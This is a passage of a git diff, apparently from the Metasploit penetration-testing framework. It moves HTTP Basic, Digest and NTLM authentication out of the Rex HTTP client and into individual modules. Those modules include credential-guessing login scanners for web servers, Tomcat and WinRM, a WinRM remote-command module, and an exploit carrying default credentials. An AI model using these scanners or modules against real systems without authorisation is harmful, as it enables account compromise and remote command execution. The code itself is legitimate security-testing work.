'data' => opts['data'] + })) + resp = c.send_recv(r, to, true) + unless resp.kind_of? Rex::Proto::Http::Response + return [nil,nil] + end + return [nil,nil] if resp.code == 404 + return [resp,c] + rescue ::Errno::EPIPE, ::Timeout::Error + end + end + + def accepts_ntlm_auth + parse_auth_methods(winrm_poke).include? "Negotiate" + end + def target_url proto = "http" if rport == 5986 or datastore['SSL'] @@ -237,18 +329,6 @@ def wmi_namespace return "/root/cimv2/" end - def send_winrm_request(data, timeout=20) - opts = { - 'uri' => datastore['URI'], - 'method' => 'POST', - 'data' => data, - 'username' => datastore['USERNAME'], - 'password' => datastore['PASSWORD'], - 'ctype' => "application/soap+xml;charset=UTF-8" - } - send_request_cgi(opts,timeout) - end - private diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 75ba1f957492..0572ea02ffe4 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -2,11 +2,6 @@ require 'rex/socket' require 'rex/proto/http' require 'rex/text' -require 'digest' -require 'rex/proto/ntlm/crypt' -require 'rex/proto/ntlm/constants' -require 'rex/proto/ntlm/utils' -require 'rex/proto/ntlm/exceptions' module Rex module Proto @@ -26,15 +21,13 @@ class Client # # Creates a new client instance # - def initialize(host, port = 80, context = {}, ssl = nil, ssl_version = nil, proxies = nil, username = '', password = '') + def initialize(host, port = 80, context = {}, ssl = nil, ssl_version = nil, proxies = nil) self.hostname = host self.port = port.to_i self.context = context self.ssl = ssl self.ssl_version = ssl_version self.proxies = proxies - self.username = username - self.password = password self.config = { 'read_max_data' => (1024*1024*1), 'vhost' => self.hostname, @@ -68,21 +61,7 @@ def initialize(host, port = 80, context = {}, ssl = nil, ssl_version = nil, prox 'uri_fake_end' => false, # bool 'uri_fake_params_start' => false, # bool 'header_folding' => false, # bool - 'chunked_size' => 0, # integer - # - # NTLM Options - # - 'usentlm2_session' => true, - 'use_ntlmv2' => true, - 'send_lm' => true, - 'send_ntlm' => true, - 'SendSPN' => true, - 'UseLMKey' => false, - 'domain' => 'WORKSTATION', - # - # Digest Options - # - 'DigestAuthIIS' => true + 'chunked_size' => 0 # integer } # This is not used right now... @@ -151,44 +130,27 @@ def set_config(opts = {}) # # Create an arbitrary HTTP request # - # @param opts [Hash] - # @option opts 'agent' [String] User-Agent header value - # @option opts 'basic_auth' [String] Basic-Auth header value - # @option opts 'connection' [String] Connection header value - # @option opts 'cookie' [String] Cookie header value - # @option opts 'data' [String] HTTP data (only useful with some methods, see rfc2616) - # @option opts 'encode' [Bool] URI encode the supplied URI, default: false - # @option opts 'headers' [Hash] HTTP headers, e.g. <code>{ "X-MyHeader" => "value" }</code> - # @option opts 'method' [String] HTTP method to use in the request, not limited to standard methods defined by rfc2616, default: GET - # @option opts 'proto' [String] protocol, default: HTTP - # @option opts 'query' [String] raw query string - # @option opts 'raw_headers' [Hash] HTTP headers - # @option opts 'uri' [String] the URI to request - # @option opts 'version' [String] version of the protocol, default: 1.1 - # @option opts 'vhost' [String] Host header value - # - # @return [Request] def request_raw(opts={}) - c_ag = opts['agent'] || config['agent'] - c_auth = opts['basic_auth'] || config['basic_auth'] || '' - c_body = opts['data'] || '' - c_conn = opts['connection'] - c_cook = opts['cookie'] || config['cookie'] c_enc = opts['encode'] || false - c_head = opts['headers'] || config['headers'] || {} - c_host = opts['vhost'] || config['vhost'] || self.hostname + c_uri = opts['uri'] || '/' + c_body = opts['data'] || '' c_meth = opts['method'] || 'GET' c_prot = opts['proto'] || 'HTTP' + c_vers = opts['version'] || config['version'] || '1.1' c_qs = opts['query'] + c_ag = opts['agent'] || config['agent'] + c_cook = opts['cookie'] || config['cookie'] + c_host = opts['vhost'] || config['vhost'] || self.hostname + c_head = opts['headers'] || config['headers'] || {} c_rawh = opts['raw_headers']|| config['raw_headers'] || '' - c_uri = opts['uri'] || '/' - c_vers = opts['version'] || config['version'] || '1.1' + c_conn = opts['connection'] + c_auth = opts['basic_auth'] || config['basic_auth'] || '' # An agent parameter was specified, but so was a header, prefer the header if c_ag and c_head.keys.map{|x| x.downcase }.include?('user-agent') c_ag = nil end - + uri = set_uri(c_uri) req = '' @@ -208,10 +170,9 @@ def request_raw(opts={}) req << set_host_header(c_host) req << set_agent_header(c_ag) + if (c_auth.length > 0) - unless c_head['Authorization'] and c_head['Authorization'].include? "Basic" - req << set_basic_auth_header(c_auth) - end + req << set_basic_auth_header(c_auth) end req << set_cookie_header(c_cook) @@ -220,46 +181,53 @@ def request_raw(opts={}) req << set_raw_headers(c_rawh) req << set_body(c_body) - request = Request.new - request.parse(req) - request.options = opts - - request + req end # # Create a CGI compatible request # - # @param (see #request_raw) - # @option opts (see #request_raw) - # @option opts 'ctype' [String] Content-Type header value, default: +application/x-www-form-urlencoded+ - # @option opts 'encode_params' [Bool] URI encode the GET or POST variables (names and values), default: true - # @option opts 'vars_get' [Hash] GET variables as a hash to be translated into a query string - # @option opts 'vars_post' [Hash] POST variables as a hash to be translated into POST data + # Options: + # - agent: User-Agent header value + # - basic_auth: Basic-Auth header value + # - connection: Connection header value + # - cookie: Cookie header value + # - ctype: Content-Type header value, default: +application/x-www-form-urlencoded+ + # - data: HTTP data (only useful with some methods, see rfc2616) + # - encode: URI encode the supplied URI, default: false + # - encode_params: URI encode the GET or POST variables (names and values), default: true + # - headers: HTTP headers as a hash, e.g. <code>{ "X-MyHeader" => "value" }</code> + # - method: HTTP method to use in the request, not limited to standard methods defined by rfc2616, default: GET + # - proto: protocol, default: HTTP + # - query: raw query string + # - raw_headers: HTTP headers as a hash + # - uri: the URI to request + # - vars_get: GET variables as a hash to be translated into a query string + # - vars_post: POST variables as a hash to be translated into POST data + # - version: version of the protocol, default: 1.1 + # - vhost: Host header value # - # @return [Request] def request_cgi(opts={}) - c_ag = opts['agent'] || config['agent'] - c_auth = opts['basic_auth'] || config['basic_auth'] || '' - c_body = opts['data'] || '' - c_cgi = opts['uri'] || '/' - c_conn = opts['connection'] - c_cook = opts['cookie'] || config['cookie'] c_enc = opts['encode'] || false c_enc_p = (opts['encode_params'] == true or opts['encode_params'].nil? ? true : false) - c_head = opts['headers'] || config['headers'] || {} - c_host = opts['vhost'] || config['vhost'] + c_cgi = opts['uri'] || '/' + c_body = opts['data'] || '' c_meth = opts['method'] || 'GET' - c_path = opts['path_info'] c_prot = opts['proto'] || 'HTTP' + c_vers = opts['version'] || config['version'] || '1.1' c_qs = opts['query'] || '' - c_rawh = opts['raw_headers'] || config['raw_headers'] || '' - c_type = opts['ctype'] || 'application/x-www-form-urlencoded' c_varg = opts['vars_get'] || {} c_varp = opts['vars_post'] || {} - c_vers = opts['version'] || config['version'] || '1.1' - + c_head = opts['headers'] || config['headers'] || {} + c_rawh = opts['raw_headers'] || config['raw_headers'] || '' + c_type = opts['ctype'] || 'application/x-www-form-urlencoded' + c_ag = opts['agent'] || config['agent'] + c_cook = opts['cookie'] || config['cookie'] + c_host = opts['vhost'] || config['vhost'] + c_conn = opts['connection'] + c_path = opts['path_info'] + c_auth = opts['basic_auth'] || config['basic_auth'] || '' uri = set_cgi(c_cgi) qstr = c_qs pstr = c_body @@ -275,7 +243,7 @@ def request_cgi(opts={}) c_varg.each_pair do |var,val| qstr << '&' if qstr.length > 0 - qstr << (c_enc_p ? set_encode_uri(var) : var) + qstr << (c_enc_p ? set_encode_uri(var) : var) qstr << '=' qstr << (c_enc_p ? set_encode_uri(val) : val) end @@ -317,9 +285,7 @@ def request_cgi(opts={}) req << set_agent_header(c_ag) if (c_auth.length > 0) - unless c_head['Authorization'] and c_head['Authorization'].include? "Basic" - req << set_basic_auth_header(c_auth) - end + req << set_basic_auth_header(c_auth) end req << set_cookie_header(c_cook) @@ -332,19 +298,12 @@ def request_cgi(opts={}) req << set_raw_headers(c_rawh) req << set_body(pstr) - request = Request.new - request.parse(req) - request.options = opts - - request + req end # # Connects to the remote server if possible. # - # @param t [Fixnum] Timeout - # @see Rex::Socket::Tcp.create - # @return [Rex::Socket::Tcp] def connect(t = -1) # If we already have a connection and we aren't pipelining, close it. if (self.conn) @@ -382,31 +341,12 @@ def close self.conn = nil end - # - # Sends a request and gets a response back - # - # If the request is a 401, and we have creds, it will attempt to complete - # authentication and return the final response - # - def send_recv(req, t = -1, persist=false) - res = _send_recv(req,t,persist) - if res and res.code == 401 and res.headers['WWW-Authenticate'] and have_creds? - res = send_auth(res, req.options, t, persist) - end - res - end - # # Transmit an HTTP request and receive the response + # If persist is set, then the request will attempt + # to reuse an existing connection. # - # If persist is set, then the request will attempt to reuse an existing - # connection. - # - # Call this directly instead of {#send_recv} if you don't want automatic - # authentication handling. - # - # @return [Response] - def _send_recv(req, t = -1, persist=false) + def send_recv(req, t = -1, persist=false) @pipeline = persist send_request(req, t) res = read_response(t) @@ -417,332 +357,11 @@ def _send_recv(req, t = -1, persist=false) # # Send an HTTP request to the server # - # @param req [Request,#to_s] The request to send - # @param t (see #connect) def send_request(req, t = -1) connect(t) conn.put(req.to_s) end - # Validates that the client has creds - def have_creds? - !(self.username.nil?) && self.username != '' - end - - # - # Params - - # res = The 401 response we need to auth from - # opts = the opts used to generate the request that created this response - # t = the timeout for the http requests - # persist = whether to persist the tcp connection for HTTP Pipelining - # - # Parses the response for what Authentication methods are supported. - # Sets the corect authorization options and passes them on to the correct - # method for sending the next request. - def send_auth(res, opts, t, persist) - supported_auths = res.headers['WWW-Authenticate'] - if supported_auths.include? 'Basic' - if opts['headers'] - opts['headers']['Authorization'] = basic_auth_header(self.username,self.password) - else - opts['headers'] = { 'Authorization' => basic_auth_header(self.username,self.password)} - end - - req = request_cgi(opts) - res = _send_recv(req,t,persist) - return res - elsif supported_auths.include? "Digest" - opts['DigestAuthUser'] = self.username.to_s - opts['DigestAuthPassword'] = self.password.to_s - temp_response = digest_auth(opts) - if temp_response.kind_of? Rex::Proto::Http::Response - res = temp_response - end - return res - elsif supported_auths.include? "NTLM" - opts['provider'] = 'NTLM' - temp_response = negotiate_auth(opts) - if temp_response.kind_of? Rex::Proto::Http::Response - res = temp_response - end - return res - elsif supported_auths.include? "Negotiate" - opts['provider'] = 'Negotiate' - temp_response = negotiate_auth(opts) - if temp_response.kind_of? Rex::Proto::Http::Response - res = temp_response - end - return res - end - return res - end - - # Converts username and password into the HTTP Basic - # authorization string. - def basic_auth_header(username,password) - auth_str = username.to_s + ":" + password.to_s - auth_str = "Basic " + Rex::Text.encode_base64(auth_str) - end - - - # - # Opts - - # Inherits all the same options as send_request_cgi - # Also expects some specific opts - # DigestAuthUser - The username for DigestAuth - # DigestAuthPass - The password for DigestAuth - # DigestAuthIIS - IIS uses a slighlty different implementation, set this for IIS support - # - # This method builds new request to complete a Digest Authentication cycle. - # We do not persist the original connection , to clear state in preparation for our auth - # We do persist the rest of the connection stream because Digest is a tcp session - # based authentication method. - # - - def digest_auth(opts={}) - @nonce_count = 0 - - to = opts['timeout'] || 20 - - digest_user = opts['DigestAuthUser'] || "" - digest_password = opts['DigestAuthPassword'] || "" - - method = opts['method'] - path = opts['uri'] - iis = true - if (opts['DigestAuthIIS'] == false or self.config['DigestAuthIIS'] == false) - iis = false - end - - begin - @nonce_count += 1 - - resp = opts['response'] - - if not resp - # Get authentication-challenge from server, and read out parameters required - r = request_cgi(opts.merge({ - 'uri' => path, - 'method' => method })) - resp = _send_recv(r, to) - unless resp.kind_of? Rex::Proto::Http::Response - return nil - end - - if resp.code != 401 - return resp - end - return resp unless resp.headers['WWW-Authenticate'] - end - - # Don't anchor this regex to the beginning of string because header - # folding makes it appear later when the server presents multiple - # WWW-Authentication options (such as is the case with IIS configured - # for Digest or NTLM). - resp['www-authenticate'] =~ /Digest (.*)/ - - parameters = {} - $1.split(/,[[:space:]]*/).each do |p| - k, v = p.split("=", 2) - parameters[k] = v.gsub('"', '') - end - - qop = parameters['qop'] - - if parameters['algorithm'] =~ /(.*?)(-sess)?$/ - algorithm = case $1 - when 'MD5' then Digest::MD5 - when 'SHA1' then Digest::SHA1 - when 'SHA2' then Digest::SHA2 - when 'SHA256' then Digest::SHA256 - when 'SHA384' then Digest::SHA384 - when 'SHA512' then Digest::SHA512 - when 'RMD160' then Digest::RMD160 - else raise Error, "unknown algorithm \"#{$1}\"" - end - algstr = parameters["algorithm"] - sess = $2 - else - algorithm = Digest::MD5 - algstr = "MD5" - sess = false - end - - a1 = if sess then - [ - algorithm.hexdigest("#{digest_user}:#{parameters['realm']}:#{digest_password}"), - parameters['nonce'], - @cnonce - ].join ':' - else - "#{digest_user}:#{parameters['realm']}:#{digest_password}" - end - - ha1 = algorithm.hexdigest(a1) - ha2 = algorithm.hexdigest("#{method}:#{path}") - - request_digest = [ha1, parameters['nonce']] - request_digest.push(('%08x' % @nonce_count), @cnonce, qop) if qop - request_digest << ha2 - request_digest = request_digest.join ':' - - # Same order as IE7 - auth = [ - "Digest username=\"#{digest_user}\"", - "realm=\"#{parameters['realm']}\"", - "nonce=\"#{parameters['nonce']}\"", - "uri=\"#{path}\"", - "cnonce=\"#{@cnonce}\"", - "nc=#{'%08x' % @nonce_count}", - "algorithm=#{algstr}", - "response=\"#{algorithm.hexdigest(request_digest)[0, 32]}\"", - # The spec says the qop value shouldn't be enclosed in quotes, but - # some versions of IIS require it and Apache accepts it. Chrome - # and Firefox both send it without quotes but IE does it this way. - # Use the non-compliant-but-everybody-does-it to be as compatible - # as possible by default. The user can override if they don't like - # it. - if qop.nil? then - elsif iis then - "qop=\"#{qop}\"" - else - "qop=#{qop}" - end, - if parameters.key? 'opaque' then - "opaque=\"#{parameters['opaque']}\"" - end - ].compact - - headers ={ 'Authorization' => auth.join(', ') } - headers.merge!(opts['headers']) if opts['headers'] - - # Send main request with authentication - r = request_cgi(opts.merge({ - 'uri' => path, - 'method' => method, - 'headers' => headers })) - resp = _send_recv(r, to, true) - unless resp.kind_of? Rex::Proto::Http::Response - return nil - end - - return resp - - rescue ::Errno::EPIPE, ::Timeout::Error - end - end - - # - # Opts - - # Inherits all the same options as send_request_cgi - # provider - What Negotiate Provider to use (supports NTLM and Negotiate) - # - # Builds a series of requests to complete Negotiate Auth. Works essentially - # the same way as Digest auth. Same pipelining concerns exist. - # - - def negotiate_auth(opts={}) - ntlm_options = { - :signing => false, - :usentlm2_session => self.config['usentlm2_session'], - :use_ntlmv2 => self.config['use_ntlmv2'], - :send_lm => self.config['send_lm'], - :send_ntlm => self.config['send_ntlm'] - } - - to = opts['timeout'] || 20 - opts['username'] ||= self.username.to_s - opts['password'] ||= self.password.to_s - - if opts['provider'] and opts['provider'].include? 'Negotiate' - provider = "Negotiate " - else - provider = 'NTLM ' - end - - opts['method']||= 'GET' - opts['headers']||= {} - - ntlmssp_flags = ::Rex::Proto::NTLM::Utils.make_ntlm_flags(ntlm_options) - workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) - domain_name = self.config['domain'] - - b64_blob = Rex::Text::encode_base64( - ::Rex::Proto::NTLM::Utils::make_ntlmssp_blob_init( - domain_name, - workstation_name, - ntlmssp_flags - )) - - ntlm_message_1 = provider + b64_blob - - begin - # First request to get the challenge - opts['headers']['Authorization'] = ntlm_message_1 - r = request_cgi(opts) - resp = _send_recv(r, to) - unless resp.kind_of? Rex::Proto::Http::Response - return nil - end - - return resp unless resp.code == 401 && resp.headers['WWW-Authenticate'] - - # Get the challenge and craft the response - ntlm_challenge = resp.headers['WWW-Authenticate'].scan(/#{provider}([A-Z0-9\x2b\x2f=]+)/i).flatten[0] - return resp unless ntlm_challenge - - ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) - blob_data = ::Rex::Proto::NTLM::Utils.parse_ntlm_type_2_blob(ntlm_message_2) - - challenge_key = blob_data[:challenge_key] - server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error - default_name = blob_data[:default_name] || '' #netbios name - default_domain = blob_data[:default_domain] || '' #netbios domain - dns_host_name = blob_data[:dns_host_name] || '' #dns name - dns_domain_name = blob_data[:dns_domain_name] || '' #dns domain - chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' #Client time - - spnopt = {:use_spn => self.config['SendSPN'], :name => self.hostname} - - resp_lm, resp_ntlm, client_challenge, ntlm_cli_challenge = ::Rex::Proto::NTLM::Utils.create_lm_ntlm_responses( - opts['username'], - opts['password'], - challenge_key, - domain_name, - default_name, - default_domain, - dns_host_name, - dns_domain_name, - chall_MsvAvTimestamp, - spnopt, - ntlm_options - ) - - ntlm_message_3 = ::Rex::Proto::NTLM::Utils.make_ntlmssp_blob_auth( - domain_name, - workstation_name, - opts['username'], - resp_lm, - resp_ntlm, - '', - ntlmssp_flags - ) - - ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) - - # Send the response - opts['headers']['Authorization'] = "#{provider}#{ntlm_message_3}" - r = request_cgi(opts) - resp = _send_recv(r, to, true) - unless resp.kind_of? Rex::Proto::Http::Response - return nil - end - return resp - - rescue ::Errno::EPIPE, ::Timeout::Error - return nil - end - end # # Read a response from the server # @@ -1220,9 +839,6 @@ def set_formatted_header(var, val) # attr_accessor :proxies - # Auth - attr_accessor :username, :password - # When parsing the request, thunk off the first response from the server, since junk attr_accessor :junk_pipeline diff --git a/lib/rex/proto/http/request.rb b/lib/rex/proto/http/request.rb index af88fdcb68da..45d13b2baed4 100644 --- a/lib/rex/proto/http/request.rb +++ b/lib/rex/proto/http/request.rb @@ -48,8 +48,6 @@ def initialize(uri = '/', proto = DefaultProtocol) end end - attr_accessor :options - # # Initializes an instance of an HTTP request with the supplied method, URI, # and protocol. diff --git a/modules/auxiliary/gather/shodan_search.rb b/modules/auxiliary/gather/shodan_search.rb index 6f63b7b95d0d..8b114dbdd874 100644 --- a/modules/auxiliary/gather/shodan_search.rb +++ b/modules/auxiliary/gather/shodan_search.rb @@ -38,10 +38,10 @@ def initialize(info = {}) )) # disabling all the unnecessary options that someone might set to break our query - deregister_options('RPORT','RHOST', 'DOMAIN', + deregister_options('RPORT','RHOST', 'BasicAuthPass', 'BasicAuthUser', 'DOMAIN', 'DigestAuthIIS', 'SSLVersion', 'NTLM::SendLM', 'NTLM::SendNTLM', 'NTLM::SendSPN', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session', - 'NTLM::UseNTLMv2', 'SSL') + 'NTLM::UseNTLMv2', 'DigestAuthPassword', 'DigestAuthUser', 'SSL') register_options( [ diff --git a/modules/auxiliary/scanner/http/cisco_device_manager.rb b/modules/auxiliary/scanner/http/cisco_device_manager.rb index 9486262be789..fd57fda9bbfe 100644 --- a/modules/auxiliary/scanner/http/cisco_device_manager.rb +++ b/modules/auxiliary/scanner/http/cisco_device_manager.rb @@ -26,7 +26,7 @@ def initialize(info={}) 'Name' => 'Cisco Device HTTP Device Manager Access', 'Description' => %q{ This module gathers data from a Cisco device (router or switch) with the device manager - web interface exposed. The USERNAME and PASSWORD options can be used to specify + web interface exposed. The BasicAuthUser and BasicAuthPass options can be used to specify authentication. }, 'Author' => [ 'hdm' ], @@ -61,7 +61,7 @@ def run_host(ip) print_good("#{rhost}:#{rport} Successfully authenticated to this device") # Report a vulnerability only if no password was specified - if datastore['PASSWORD'].to_s.length == 0 + if datastore['BasicAuthPass'].to_s.length == 0 report_vuln( { diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index 076bb36d70f6..5a6b0ab9a617 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb @@ -26,7 +26,7 @@ def initialize [ ], - 'Author' => [ 'hdm' , 'thelightcosine'], + 'Author' => [ 'hdm' ], 'References' => [ [ 'CVE', '1999-0502'] # Weak password @@ -48,7 +48,9 @@ def initialize register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ]) end - def find_auth_uri + def find_auth_uri_and_scheme + + path_and_scheme = [] if datastore['AUTH_URI'] and datastore['AUTH_URI'].length > 0 paths = [datastore['AUTH_URI']] else @@ -78,9 +80,21 @@ def find_auth_uri next if not res end - return path + next if not res.code == 401 + next if not res.headers['WWW-Authenticate'] + path_and_scheme << path + case res.headers['WWW-Authenticate'] + when /Basic/i + path_and_scheme << "Basic" + when /NTLM/i + path_and_scheme << "NTLM" + when /Digest/i + path_and_scheme << "Digest" + end + return path_and_scheme end + return path_and_scheme end def target_url @@ -97,7 +111,7 @@ def run_host(ip) print_error("You need need to set AUTH_URI when using PUT Method !") return end - @uri = find_auth_uri() + @uri, @scheme = find_auth_uri_and_scheme() if ! @uri print_error("#{target_url} No URI found that asks for HTTP authentication") return @@ -105,7 +119,12 @@ def run_host(ip) @uri = "/#{@uri}" if @uri[0,1] != "/" - print_status("Attempting to login to #{target_url}") + if ! @scheme + print_error("#{target_url} Incompatible authentication scheme") + return + end + + print_status("Attempting to login to #{target_url} with #{@scheme} authentication") each_user_pass { |user, pass| do_login(user, pass) @@ -114,23 +133,27 @@ def run_host(ip) def do_login(user='admin', pass='admin') vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'") + success = false + proof = "" + + ret = do_http_login(user,pass,@scheme) + return :abort if ret == :abort + if ret == :success + proof = @proof.dup + success = true + end - response = do_http_login(user,pass) - result = determine_result(response) - - return :abort if result == :abort - - if result == :success + if success print_good("#{target_url} - Successful login '#{user}' : '#{pass}'") any_user = false any_pass = false vprint_status("#{target_url} - Trying random username with password:'#{pass}'") - any_user = determine_result(do_http_login(Rex::Text.rand_text_alpha(8), pass)) + any_user = do_http_login(Rex::Text.rand_text_alpha(8), pass, @scheme) vprint_status("#{target_url} - Trying username:'#{user}' with random password") - any_pass = determine_result(do_http_login(user, Rex::Text.rand_text_alpha(8))) + any_pass = do_http_login(user, Rex::Text.rand_text_alpha(8), @scheme) if any_user == :success user = "anyuser" @@ -152,7 +175,7 @@ def do_login(user='admin', pass='admin') :sname => (ssl ? 'https' : 'http'), :user => user, :pass => pass, - :proof => "WEBAPP=\"Generic\", PROOF=#{response.to_s}", + :proof => "WEBAPP=\"Generic\", PROOF=#{proof}", :source_type => "user_supplied", :active => true ) @@ -165,28 +188,143 @@ def do_login(user='admin', pass='admin') end end - def do_http_login(user,pass) + def do_http_login(user,pass,scheme) + case scheme + when /NTLM/i + do_http_auth_ntlm(user,pass) + when /Digest/i + do_http_auth_digest(user,pass,datastore['REQUESTTYPE']) + when /Basic/i + do_http_auth_basic(user,pass) + else + vprint_error("#{target_url}: Unknown authentication scheme") + return :abort + end + end + + def do_http_auth_ntlm(user,pass) begin - response = send_request_cgi({ + resp,c = send_http_auth_ntlm( 'uri' => @uri, - 'method' => datastore['REQUESTTYPE'], 'username' => user, 'password' => pass - }) - return response + ) + c.close + return :abort if (resp.code == 404) + + if [200, 301, 302].include?(resp.code) + @proof = resp + return :success + end + rescue ::Rex::ConnectionError vprint_error("#{target_url} - Failed to connect to the web server") - return nil + return :abort end + + return :fail end - def determine_result(response) - return :abort unless response.kind_of? Rex::Proto::Http::Response - return :abort unless response.code - return :success if [200, 301, 302].include?(response.code) + def do_http_auth_basic(user,pass) + user_pass = Rex::Text.encode_base64(user + ":" + pass) + + begin + res = send_request_cgi({ + 'uri' => @uri, + 'method' => 'GET', + 'headers' => + { + 'Authorization' => "Basic #{user_pass}", + } + }, 25) + + unless (res.kind_of? Rex::Proto::Http::Response) + vprint_error("#{target_url} not responding") + return :abort + end + + return :abort if (res.code == 404) + + if [200, 301, 302].include?(res.code) + @proof = res + return :success + end + + rescue ::Rex::ConnectionError + vprint_error("#{target_url} - Failed to connect to the web server") + return :abort + end + return :fail end + def do_http_auth_digest(user,pass,requesttype) + path = datastore['AUTH_URI'] || "/" + begin + if requesttype == "PUT" + res,c = send_digest_request_cgi({ + 'uri' => path, + 'method' => requesttype, + 'data' => 'Test123\r\n', + #'DigestAuthIIS' => false, + 'DigestAuthUser' => user, + 'DigestAuthPassword' => pass + }, 25) + elsif requesttype == "PROPFIND" + res,c = send_digest_request_cgi({ + 'uri' => path, + 'method' => requesttype, + 'data' => '<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>', + #'DigestAuthIIS' => false, + 'DigestAuthUser' => user, + 'DigestAuthPassword' => pass, + 'headers' => { 'Depth' => '0'} + }, 25) + else + res,c = send_digest_request_cgi({ + 'uri' => path, + 'method' => requesttype, + #'DigestAuthIIS' => false, + 'DigestAuthUser' => user, + 'DigestAuthPassword' => pass + }, 25) + end + + unless (res.kind_of? Rex::Proto::Http::Response) + vprint_error("#{target_url} not responding") + return :abort + end + + return :abort if (res.code == 404) + + if ( [200, 301, 302].include?(res.code) ) or (res.code == 201) + if ((res.code == 201) and (requesttype == "PUT")) + print_good("Trying to delete #{path}") + del_res,c = send_digest_request_cgi({ + 'uri' => path, + 'method' => 'DELETE', + 'DigestAuthUser' => user, + 'DigestAuthPassword' => pass + }, 25) + if not (del_res.code == 204) + print_error("#{path} could be created, but not deleted again. This may have been noisy ...") + end + end + @proof = res + return :success + end + + if (res.code == 207) and (requesttype == "PROPFIND") + @proof = res + return :success + end + + rescue ::Rex::ConnectionError + vprint_error("#{target_url} - Failed to connect to the web server") + return :abort + end + return :fail + end end diff --git a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb index 75f88e7ed3db..65ab691e66dd 100644 --- a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb +++ b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb @@ -87,6 +87,10 @@ def run_host(ip) vprint_error("http://#{rhost}:#{rport}#{uri} - No response") return end + if res.code != 401 + vprint_error("http://#{rhost}:#{rport} - Authorization not requested") + return + end each_user_pass { |user, pass| do_login(user, pass) @@ -103,8 +107,10 @@ def do_login(user='tomcat', pass='tomcat') res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', - 'username' => user, - 'password' => pass + 'headers' => + { + 'Authorization' => "Basic #{user_pass}", + } }, 25) unless (res.kind_of? Rex::Proto::Http::Response) vprint_error("http://#{rhost}:#{rport}#{uri} not responding") diff --git a/modules/auxiliary/scanner/winrm/winrm_cmd.rb b/modules/auxiliary/scanner/winrm/winrm_cmd.rb index 88e9e717d605..12f0c7042250 100644 --- a/modules/auxiliary/scanner/winrm/winrm_cmd.rb +++ b/modules/auxiliary/scanner/winrm/winrm_cmd.rb @@ -40,6 +40,10 @@ def initialize def run_host(ip) + unless accepts_ntlm_auth + print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" + return + end streams = winrm_run_cmd(datastore['CMD']) return unless streams.class == Hash print_error streams['stderr'] unless streams['stderr'] == '' diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb index 946903113efe..d8012fb723f9 100644 --- a/modules/auxiliary/scanner/winrm/winrm_login.rb +++ b/modules/auxiliary/scanner/winrm/winrm_login.rb @@ -39,8 +39,12 @@ module without SSL, the 'AllowUnencrypted' winrm option must be set. def run_host(ip) + unless accepts_ntlm_auth + print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" + return + end each_user_pass do |user, pass| - resp = send_winrm_request(test_request) + resp,c = send_request_ntlm(test_request) if resp.nil? print_error "#{ip}:#{rport}: Got no reply from the server, connection may have timed out" return diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index 0c5eeb627414..ed09cfd5830e 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -42,7 +42,12 @@ def initialize def run_host(ip) - resp = send_winrm_request(winrm_wql_msg(datastore['WQL'])) + unless accepts_ntlm_auth + print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" + return + end + + resp,c = send_request_ntlm(winrm_wql_msg(datastore['WQL'])) if resp.nil? print_error "Got no reply from the server" return diff --git a/modules/auxiliary/server/http_ntlmrelay.rb b/modules/auxiliary/server/http_ntlmrelay.rb index 080803918b83..fda08e41c47f 100644 --- a/modules/auxiliary/server/http_ntlmrelay.rb +++ b/modules/auxiliary/server/http_ntlmrelay.rb @@ -84,7 +84,8 @@ def initialize(info = {}) 'IPC$,ADMIN$,C$,D$,CCMLOGS$,ccmsetup$,share,netlogon,sysvol']) ], self.class) - deregister_options('DOMAIN', 'NTLM::SendLM', 'NTLM::SendSPN', 'NTLM::SendNTLM', 'NTLM::UseLMKey', + deregister_options('BasicAuthPass', 'BasicAuthUser', 'DOMAIN', 'DigestAuthPassword', + 'DigestAuthUser', 'NTLM::SendLM', 'NTLM::SendSPN', 'NTLM::SendNTLM', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2') end diff --git a/modules/exploits/linux/http/piranha_passwd_exec.rb b/modules/exploits/linux/http/piranha_passwd_exec.rb index 4312fa2bd482..d87027cadb50 100644 --- a/modules/exploits/linux/http/piranha_passwd_exec.rb +++ b/modules/exploits/linux/http/piranha_passwd_exec.rb @@ -72,8 +72,8 @@ def initialize(info = {}) register_options( [ - OptString.new('USERNAME', [true, 'The HTTP username to specify for basic authentication', 'piranha']), - OptString.new('PASSWORD', [true, 'The HTTP password to specify for basic authentication', 'q']), + OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'piranha']), + OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'q']), ], self.class) end @@ -96,7 +96,7 @@ def exploit end if res.code == 401 - print_error("401 Authorization Required! Our credentials were not accepted!") + print_error("401 Authorization Required! Our BasicAuthUser and BasicAuthPass credentials not accepted!") elsif (res.code == 200 and res.body =~ /The passwords you supplied match/) print_status("Command successfully executed (according to the server).") end diff --git 